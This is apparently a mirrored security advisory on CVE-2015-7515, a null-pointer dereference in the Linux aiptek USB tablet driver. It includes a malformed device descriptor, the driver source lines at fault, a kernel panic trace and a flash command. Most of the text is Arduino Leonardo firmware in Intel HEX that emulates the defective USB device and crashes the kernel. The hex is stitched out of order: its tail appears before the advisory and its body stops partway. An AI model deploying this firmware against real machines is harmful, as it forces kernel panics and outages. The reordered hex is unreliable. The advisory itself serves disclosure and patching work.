:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:1014240000000040820403020001010203010902DA
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
HireHackking 
OS-S Security Advisory 2016-05
Linux aiptek Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: CVE-2015-7515
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (aiptek driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the 
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/OSS-2016-05_aiptek.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB 
device using the aiptek driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength:	0x12
bDescriptorType:	0x1
bcdUSB:	0x200
bDeviceClass:	0x3
bDeviceSubClass:	0x0
bDeviceProtocol:	0x0
bMaxPacketSize:	0x40
idVendor:	0x458
idProduct:	0x5003
bcdDevice:	0x100
iManufacturer:	0x1
iProduct:	0x2
iSerialNumbers:	0x3
bNumConfigurations:	0x1
[*] Configuration-Descriptor
bLength:	0x9
bDescriptorType:	0x2
wTotalLength:	0x27
bNumInterfaces:	0x1
bConfigurationValue:	0x1
iConfiguration:	0x0
bmAttributes:	0x0
bMaxPower:	0x31
[*] Interface-Descriptor
bLength:	0x9
bDescriptorType:	0x4
bInterfaceNumber:	0x0
bAlternateSetting:	0x0
bNumEndpoints:	0x0
bInterfaceClass:	0x0
bInterfaceSubClass:	0x0
bInterfaceProtocol:	0x0
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x81
bmAttribut:	0x3
wMaxPacketSize:	0x404
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x1
bmAttribut:	0x2
wMaxPacketSize:	0x4
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x82
bmAttribut:	0x1
wMaxPacketSize:	0x4
bInterval:	0xc

The aiptek driver assumes that there will be at least one endpoint-descriptor.
If the interface-descriptor contains a zero-value for bNumEndpoints or no 
endpoint-descriptor is provided, the driver tries to dereference a null-
pointer and the kernel crashes:

****
$ nm aiptek.ko.debug | grep aiptek_probe
0000000000001ea0 t aiptek_probe
$ addr2line -e aiptek.ko.debug 2303
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/input/tablet/aiptek.c:1830
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.c)

1822 endpoint = &intf->altsetting[0].endpoint[0].desc; /* Nullpointer */
1823
1824 /* Go set up our URB, which is called when the tablet receives
1825 * input.
1826 */
1827 usb_fill_int_urb(aiptek->urb,
1828 aiptek->usbdev,
1829 usb_rcvintpipe(aiptek->usbdev,
1830 endpoint->bEndpointAddress), /* Nullpointer-
Dereference */
1831 aiptek->data, 8, aiptek_irq, aiptek,
1832 endpoint->bInterval);
****

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This 
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U 
flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to 
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, 
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
A patch was provided on the November, 25th 2015.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1285326
https://bugzilla.redhat.com/show_bug.cgi?id=1283350

Kernel Stacktrace:

[ 622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint 
descriptors, different from the interface descriptor's value: 0
[ 622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003
[ 622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2, 
SerialNumber=3
[ 622.399416] usb 1-1: Product: Ä?
[ 622.404640] usb 1-1: Manufacturer: Ä?
[ 622.410079] usb 1-1: SerialNumber: %
[ 622.444650] BUG: unable to handle kernel NULL pointer dereference at 
0000000000000002
[ 622.445019] IP: [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] PGD 0 
[ 622.445019] Oops: 0000 [#1] SMP 
[ 622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT 
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc 
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter 
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat 
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter 
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper 
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c 
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix 
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted 
3.10.0-229.14.1.el7.x86_64 #1
[ 622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000
[ 622.445019] RIP: 0010:[<ffffffffa0395303>] [<ffffffffa0395303>] 
aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] RSP: 0018:ffff88000f4cfb80 EFLAGS: 00010286
[ 622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800
[ 622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000
[ 622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000
[ 622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800
[ 622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834
[ 622.445019] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) 
knlGS:0000000000000000
[ 622.445019] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4: 
00000000000006f0
[ 622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
[ 622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 622.445019] Stack:
[ 622.445019] ffff88000bcd0800 0000000000000001 0000019000000246 
0000019000000032
[ 622.445019] 0000006400000019 0000012c000000c8 000000000cc3e092 
ffff88000bcd0890
[ 622.445019] ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0
[ 622.445019] Call Trace:
[ 622.445019] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 622.445019] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 622.445019] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 622.445019] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 622.445019] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 622.445019] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 622.445019] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 622.445019] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 622.445019] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 622.445019] [<ffffffffa039a000>] ? 0xffffffffa0399fff
[ 622.445019] [<ffffffffa039a01e>] aiptek_driver_init+0x1e/0x1000 [aiptek]
[ 622.445019] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 622.445019] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 622.445019] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 622.445019] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 622.445019] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 622.445019] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7 
e8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f> 
b6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00 
[ 622.445019] RIP [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[ 622.445019] RSP <ffff88000f4cfb80>
[ 622.445019] CR2: 0000000000000002
[ 622.860772] ---[ end trace b239663354a1c556 ]---
[ 622.864813] Kernel panic - not syncing: Fatal exception
[ 622.865768] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C2050C942D04CE
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940C02C3
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C50009030C0306
:1000B000FF0203032D032D032D0310031403180364
:1000C0001E0322032D0328030000000200080E0077
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E0EDF3E102C005900D92A436B107D5
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9402070C940000089547
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E949F020E94C70060E06D
:1001B00083E00E942E0361E087E00E942E0361E04D
:1001C00088E00E942E030E9457067E012AE9E20E73
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93F90168
:1002C0009082E4E0D9011196EC93F901DC01292D2B
:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB
:1002E0001B96FC93EE931A971D96BC92AE921C97A8
:1002F0001183008373836283558344830C521109F5
:100300002CE0F80111922A95E9F721E0D80119961D
:100310002C931997FE01E059FF4F01900D929A948A
:10032000E1F7F8019387828761E088E00E94670324
:100330008BE492E00E94630688E892E00E946306E4
:1003400087EC92E00E94630686E093E00E946306D9
:1003500082E493E00E9463068FE793E00E946306C5
:1003600084EA93E00E9463068BEE93E00E946306AA
:1003700083E00E949D03892B09F047C05E01F3E2F0
:10038000AF0EB11C8824839482E1982E84E194E01E
:100390000E946306BF92AF92DF92CF92FF92EF92DC
:1003A0001F928F921F930F932DB73EB722513109A1
:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6
:1003C000FE01FB96892D01900D928A95E1F78DE64D
:1003D00095E00E94010668E873E180E090E00E94E9
:1003E00079028DE695E00E944C0660E087E00E946D
:1003F000670368E873E180E090E00E9479020FB63D
:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0
:1004100090E00E947902ACCF1F920F920FB60F921C
:1004200011242F933F938F939F93AF93BF9380910A
:10043000650590916605A0916705B09168053091BA
:10044000640523E0230F2D3720F40196A11DB11D73
:1004500005C026E8230F0296A11DB11D2093640557
:100460008093650590936605A0936705B093680532
:100470008091690590916A05A0916B05B0916C051A
:100480000196A11DB11D8093690590936A05A09303
:100490006B05B0936C05BF91AF919F918F913F9188
:1004A0002F910F900FBE0F901F9018953FB7F894A3
:1004B0008091690590916A05A0916B05B0916C05DA
:1004C00026B5A89B05C02F3F19F00196A11DB11DAF
:1004D0003FBF6627782F892F9A2F620F711D811DCC
:1004E000911D42E0660F771F881F991F4A95D1F72B
:1004F0000895CF92DF92EF92FF92CF93DF936B013B
:100500007C010E945602EB01C114D104E104F10404
:1005100079F00E9456026C1B7D0B683E7340A0F37D
:1005200081E0C81AD108E108F108C851DC4FECCFCE
:10053000DF91CF91FF90EF90DF90CF900895789466
:1005400084B5826084BD84B5816084BD85B58260D8
:1005500085BD85B5816085BDEEE6F0E08081816076
:100560008083E1E8F0E01082808182608083808176
:1005700081608083E0E8F0E0808181608083E1E950
:10058000F0E0808182608083808181608083E0E907
:10059000F0E0808181608083E1ECF0E08081846024
:1005A0008083808182608083808181608083E3ECAE
:1005B000F0E0808181608083E0ECF0E08081826007
:1005C0008083E2ECF0E0808181608083EAE7F0E004
:1005D000808184608083808182608083808181606B
:1005E0008083808180688083089590E0FC0131974A
:1005F000EE30F10590F5EA5AFF4F0C94A90980916D
:1006000080008F7703C0809180008F7D8093800071
:10061000089584B58F7702C084B58F7D84BD089519
:10062000809190008F7707C0809190008F7D03C0EC
:1006300080919000877F8093900008958091C00002
:100640008F7703C08091C0008F7D8093C000089594
:100650008091C200877F8093C2000895CF93DF937B
:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A
:100670008491882349F190E0880F991FFC01E25C86
:10068000FE4FA591B491805D9E4FFC01C591D49120
:100690009FB7611108C0F8948C91209582238C93A8
:1006A000888182230AC0623051F4F8948C91322FF1
:1006B000309583238C938881822B888304C0F8949F
:1006C0008C91822B8C939FBFDF91CF9108950F93D4
:1006D0001F93CF93DF931F92CDB7DEB7282F30E063
:1006E000F901E853FF4F8491F901EA51FF4F14914A
:1006F000F901EC5FFE4F04910023C9F0882321F03B
:1007000069830E94F5026981E02FF0E0EE0FFF1F80
:10071000E05DFE4FA591B4919FB7F8948C91611163
:1007200003C01095812301C0812B8C939FBF0F9034
:10073000DF91CF911F910F910895CF93DF93282FD1
:1007400030E0F901E853FF4F8491F901EA51FF4F7E
:10075000D491F901EC5FFE4FC491CC2391F081114B
:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52
:10077000A591B4912C912D2381E090E021F480E0AB
:1007800002C080E090E0DF91CF910895615030F099
:100790002091F100FC0120830196F8CF289884E68F
:1007A00080937D0508951092E900109271051092D2
:1007B000700590936F0580936E050895FF920F93D7
:1007C0001F93CF93DF93F82E8B01EA01BA01C80182
:1007D0000E94A406F80120E030E08EEF2C173D07C0
:1007E00091F1F7FE02C0A49101C0A0816091700553
:1007F0007091710540916E0550916F0564177507F2
:10080000ACF49091E8009570E1F39091E80092FDCE
:100810001CC0A093F100A0917005B09171051196D4
:10082000AF73BB27AB2B11F48093E800A091700548
:10083000B09171051196B0937105A09370052F5F6B
:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1
:10085000CF911F910F91FF9008951F920F920FB6A5
:100860000F9211246F927F928F929F92AF92BF92BC
:10087000CF92DF92EF92FF920F931F932F933F93AC
:100880004F935F936F937F938F939F93AF93BF9398
:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1
:1008A000CDBF1092E9008091E80083FF46C168E067
:1008B000CE010A960E94C60382EF8093E8009A85D3
:1008C00097FF05C08091E80080FFFCCF03C08EEF4A
:1008D0008093E800892F807609F023C18B858111F0
:1008E00005C01092F1001092F10020C1282F2D7F39
:1008F000213009F41BC1853049F48091E80080FF64
:10090000FCCF8C8580688093E30010C1863009F0AD
:10091000E1C02D8508891989223009F0B3C0EC8423
:100920008E2D90E020917305309174058217930706
:100930000CF09FC00E94D3031F92EF928DE394E0CE
:100940009F938F930E9481068CE0E89E7001112492
:10095000E0917505F0917605EE0DFF1D89E0DE0151
:10096000119601900D928A95E1F7C8010E94D30378
:1009700049E050E0BE016F5F7F4F80E00E94DE03E0
:100980000F900F900F900F90C12CD12C612C712CD7
:1009900033E7A32E34E0B32E4AEA842E44E0942EAB
:1009A000E0917505F0917605EE0DFF1D818590E0D3
:1009B000681679060CF0BAC07F926F92BF92AF9220
:1009C0000E948106E0917505F0917605EE0DFF1D00
:1009D000628573856C0D7D1D49E050E080E00E94CA
:1009E000DE030F900F900F900F9000E010E0E09169
:1009F0007505F0917605EE0DFF1D0284F385E02D5F
:100A0000EC0DFD1D818590E0081719075CF51F931B
:100A10000F939F928F920E948106E0917505F0914D
:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16
:100A3000C801880F991FA485B585A80FB91F4D91CE
:100A40005C910284F385E02DE80FF91F60817181CC
:100A500080E00E94DE030F5F1F4F0F900F900F90FA
:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0
:100A700097CF8FED94E09F938F930E9481060F9004
:100A80000F9058C0C8012A8B0E94D3032A892130B5
:100A9000C1F0233009F04EC08C851F928F9389EFEF
:100AA00094E09F938F930E94810642E050E062E8B9
:100AB00071E080E00E94DE030F900F900F900F9086
:100AC00035C04091000150E060E071E080E00E949C
:100AD000DE032CC0873071F1883021F481E08093EF
:100AE000F10024C0893011F5937021F5EDE4F1E0B7
:100AF00081E021E096E38093E9002093EB003491BC
:100B00003093EC009093ED008F5F3196843099F72D
:100B10008EE78093EA001092EA008C85809372053C
:100B200005C0888999890E94D30304C08EEF809301
:100B3000E80003C081E28093EB0062960FB6F89460
:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F
:100B5000AF919F918F917F916F915F914F913F9155
:100B60002F911F910F91FF90EF90DF90CF90BF904A
:100B7000AF909F908F907F906F900F900FBE0F90CF
:100B80001F9018951F920F920FB60F9211248F93FA
:100B90009F938091E1001092E10083FF0FC01092BB
:100BA000E90091E09093EB001092EC0092E39093B7
:100BB000ED001092720598E09093F00082FF1AC049
:100BC00080917E05882339F080917E058150809345
:100BD0007E05882369F080917D05882359F08091F6
:100BE0007D05815080937D05811104C0289A02C043
:100BF0005D9AF1CF9F918F910F900FBE0F901F9034
:100C00001895CF93DF93CDB7DEB782E1FE0135961D
:100C1000A0E0B1E001900D928A95E1F78F89988D5F
:100C20009093760580937505898D9A8D90937405C0
:100C3000809373058B8D9C8D90937C0580937B05B1
:100C40008D8D9E8D90937A05809379058F8D98A1D7
:100C500090937805809377051092720581E08093D8
:100C6000D70080EA8093D80082E189BD09B400FEF4
:100C7000FDCF61E070E080E090E00E94790280E9C1
:100C80008093D8008CE08093E2001092E000559AA7
:100C9000209ADF91CF91089581E08093E00008953C
:100CA0009091C80095FFFCCF8093CE0008951092DC
:100CB000CD0087E68093CC0088E18093C9008EE068
:100CC0008093CA0008950F931F93CF93DF93EC0195
:100CD0008C01FE0101900020E9F73197EC1BFD0B20
:100CE000C8018C1B9D0B8E179F0730F4F801819172
:100CF0008F010E945006EDCFDF91CF911F910F9190
:100D00000895CF93DF93CDB7DEB7DA950FB6F89499
:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193
:100D20009F0160E071E0CE0101960E940507CE01AF
:100D300001960E946306D3950FB6F894DEBF0FBEEE
:100D4000CDBFDF91CF9108958F929F92AF92BF92C6
:100D5000CF92DF92EF92FF920F931F93CF93DF9387
:100D600000D0CDB7DEB75B0122E535E03F932F938E
:100D700089839A830E9481068981882E9A81992E7F
:100D80000F900F9000E010E08EE5E82E85E0F82E41
:100D900091E1C92E94E0D92E0A151B05E4F4F40163
:100DA00081914F0190E09F938F93FF92EF920E9469
:100DB00081060F5F1F4FC8018F7099270F900F900A
:100DC0000F900F90892B41F7DF92CF920E948106FE
:100DD0000F900F90E1CF81E194E09F938F930E9459
:100DE00081060F900F900F900F90DF91CF911F9180
:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA
:100E00008F900895F8940C94E609AEE0B0E0EBE022
:100E1000F7E00C94BD098C01CA0146E04C831A83AB
:100E2000098377FF02C060E070E8615071097E833A
:100E30006D83A901BC01CE0101960E9431074D814D
:100E40005E8157FD0AC02F813885421753070CF485
:100E50009A01F801E20FF31F10822E96E4E00C9441
:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E
:100E70006B018A01FC0117821682838181FFBDC14B
:100E8000CE0101964C01F7019381F60193FD859106
:100E900093FF81916F01882309F4ABC1853239F446
:100EA00093FD859193FF81916F01853229F4B701FC
:100EB00090E00E941909E7CF512C312C20E020321C
:100EC000A0F48B3269F030F4803259F0833269F447
:100ED00020612CC08D3239F0803339F4216026C076
:100EE0002260246023C0286021C027FD27C030ED88
:100EF000380F3A3078F426FF06C0FAE05F9E300DD6
:100F00001124532E13C08AE0389E300D1124332E45
:100F100020620CC08E3221F426FD6BC1206406C015
:100F20008C3611F4206802C0883641F4F60193FD36
:100F3000859193FF81916F018111C1CF982F9F7D82
:100F40009554933028F40C5F1F4FFFE3F9830DC0D5
:100F5000833631F0833771F0833509F05BC022C0EE
:100F6000F801808189830E5F1F4F44244394512CE4
:100F7000540115C03801F2E06F0E711CF801A08019
:100F8000B18026FF03C0652D70E002C06FEF7FEFD8
:100F9000C5012C870E940E092C0183012C852F7717
:100FA000222E17C03801F2E06F0E711CF801A080EC
:100FB000B18026FF03C0652D70E002C06FEF7FEFA8
:100FC000C5012C870E9403092C012C852068222E44
:100FD000830123FC1BC0832D90E048165906B0F412
:100FE000B70180E290E00E9419093A94F4CFF5012C
:100FF00027FC859127FE81915F01B70190E00E9457
:10100000190931103A94F1E04F1A51084114510472
:1010100071F7E5C0843611F0893639F5F80127FFFC
:1010200007C060817181828193810C5F1F4F08C06E
:1010300060817181882777FD8095982F0E5F1F4F03
:101040002F76B22E97FF09C0909580957095619587
:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF
:101060000E944B09A82EA81844C0853729F42F7E6A
:10107000B22E2AE030E025C0F22FF97FBF2E8F3646
:10108000C1F018F4883579F0B4C0803719F088378A
:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA
:1010A0008460B82E09C024FF0AC09F2F9660B92E15
:1010B00006C028E030E005C020E130E002C020E1B9
:1010C00032E0F801B7FE07C06081718182819381AF
:1010D0000C5F1F4F06C06081718180E090E00E5F61
:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3
:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0
:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8
:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E
:10112000F11D8081803311F4297E09C022FF06C0A1
:101130007394739404C0822F867809F0739423FD0E
:1011400013C020FF06C05A2C731418F4530C571800
:10115000732C731468F4B70180E290E02C870E942E
:10116000190973942C85F5CF731410F4371801C046
:10117000312C24FF12C0B70180E390E02C870E943D
:1011800019092C8522FF17C021FF03C088E590E0D4
:1011900002C088E790E0B7010CC0822F867859F032
:1011A00021FD02C080E201C08BE227FD8DE2B70184
:1011B00090E00E941909A51438F4B70180E390E08B
:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F
:1011D0008081B70190E00E941909A110F5CF33205A
:1011E00009F451CEB70180E290E00E9419093A94C7
:1011F000F6CFF7018681978102C08FEF9FEF2C9683
:10120000E2E10C94CB09FC010590615070400110A3
:10121000D8F7809590958E0F9F1F0895FC0161501F
:10122000704001900110D8F7809590958E0F9F1F08
:1012300008950F931F93CF93DF93182F092FEB017E
:101240008B8181FD03C08FEF9FEF20C082FF10C014
:101250004E815F812C813D81421753077CF4E881E8
:10126000F9819F012F5F3F4F39832883108306C088
:10127000E885F985812F0995892B29F72E813F81F2
:101280002F5F3F4F3F832E83812F902FDF91CF9190
:101290001F910F910895FA01AA27283051F12031AA
:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA
:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C
:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A
:1012D000711D811D911DA11D20D009F468943F91BD
:1012E0002AE0269F11243019305D3193DEF6CF01BC
:1012F0000895462F4770405D4193B3E00FD0C9F782
:10130000F6CF462F4F70405D4A3318F0495D31FDEE
